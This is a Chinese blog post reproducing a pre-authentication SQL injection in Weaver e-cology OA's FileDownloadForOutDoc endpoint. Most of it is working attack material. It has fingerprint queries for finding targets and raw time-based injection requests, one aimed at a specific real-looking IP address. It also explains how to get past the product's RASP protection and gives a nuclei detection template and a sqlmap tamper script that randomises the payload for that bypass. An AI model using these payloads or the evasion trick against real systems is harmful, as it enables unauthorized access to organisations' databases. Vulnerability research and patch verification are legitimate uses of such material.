十三の博客
0%

【漏洞复现】泛微 e-cology-FileDownloadForOutDoc前台SQL注入漏洞复现

发表于 分类于

【漏洞复现】泛微 e-cology-FileDownloadForOutDoc前台SQL注入漏洞复现

最近hw也是曝出好多好多漏洞啊,看的考研人直发痒啊啊啊。0day咱拿不到还不能玩点高频漏洞吗。所以这里收集了30几个23年的常用漏洞,来挨个复现一下哈。没事就复现一下。目前笔者也是在学c语言准备考研了,考完之后的话可能大概会继续专研技术,主要分两个方向吧,恶意软件编写和分析和web安全方面的,当然一切都还没有定数。(万一去玩web3的也说不定呢)祝笔者今年顺利考上研究生。

影响范围

1
2
3
Ecology 9.x 补丁版本 < 10.58.0

Ecology 8.x 补丁版本 < 10.58.0

语法特征

1
2
3
4
5
app.name="泛微 e-cology 9.0 OA"

app.name="泛微 e-cology OA"

app="泛微-协同商务系统"

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 101.230.160.27:8885
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "AyurgkJJwkD"
If-Modified-Since: Sat, 15 Oct 2022 01:55:58 GMT
Connection: close
Content-Length: 47

fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1

由于泛微OA启用了RASP,同一个请求执行两次会被拦截,所以需要在请求包中添加随机参数;下面是RASP的介绍

RASP是Runtime Application Self-Protection(运行时应用自我保护)的缩写,是一种用于保护应用程序免受攻击的安全技术。它是在应用程序运行时进行安全检测和保护的一种方法,可以在应用程序本身内部或与应用程序紧密集成的组件中实现。

1
2
3
4
5
6
7
8
9
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

nuclei poc如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
id: ecology-oa-filedownloadforoutdoc-sqli

info:
  name: EcologyOA filedownloadforoutdoc - SQL injection
  author: unknown
  severity: critical
  description: EcologyOA filedownloadforoutdoc interface has SQL injection
  tags: ecology-oa,sqli

requests:
  - raw:
      - |
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close        

        fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'

tamper脚本

1
2
3
4
5
6
7
8
9
10
11
import random
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def tamper(payload, **kwargs):
  res = ""
  ran = random.randint(1,2**20)
  res = str(ran)+payload
  return res